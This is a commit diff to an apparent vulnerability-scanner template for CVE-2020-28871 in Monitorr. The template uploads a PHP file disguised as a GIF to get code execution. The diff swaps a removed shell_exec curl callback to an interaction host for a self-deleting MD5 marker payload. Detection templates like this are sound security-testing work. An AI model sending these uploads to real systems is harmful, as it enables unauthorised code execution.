Update CVE-2020-28871.yaml

patch-1
J4vaovo 2023-06-15 19:44:34 +08:00 committed by GitHub
parent 6f34cf7a47
commit 1898e69137
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 13 deletions

View File

@ -19,10 +19,7 @@ info:
epss-score: 0.96822
metadata:
max-request: 2
tags: unauth,cve,fileupload,monitorr,oast,edb,intrusive,packetstorm,cve2020,rce
variables:
useragent: '{{rand_base(6)}}'
tags: unauth,cve,fileupload,monitorr,edb,intrusive,packetstorm,cve2020,rce
http:
- raw:
@ -42,7 +39,7 @@ http:
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
Content-Type: image/gif
GIF89a213213123<?php shell_exec("curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'");
GIF89a213213123<?php echo md5('CVE-2020-28871');unlink(__FILE__); ?>
-----------------------------31046105003900160576454225745--
@ -53,13 +50,10 @@ http:
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: body
words:
- "http"
- "d03c180355b797069cc047ff5606d689"
- type: word
part: interactsh_request
words:
- "User-Agent: {{useragent}}"
# Enhanced by mp on 2022/03/27
- type: status
status:
- 200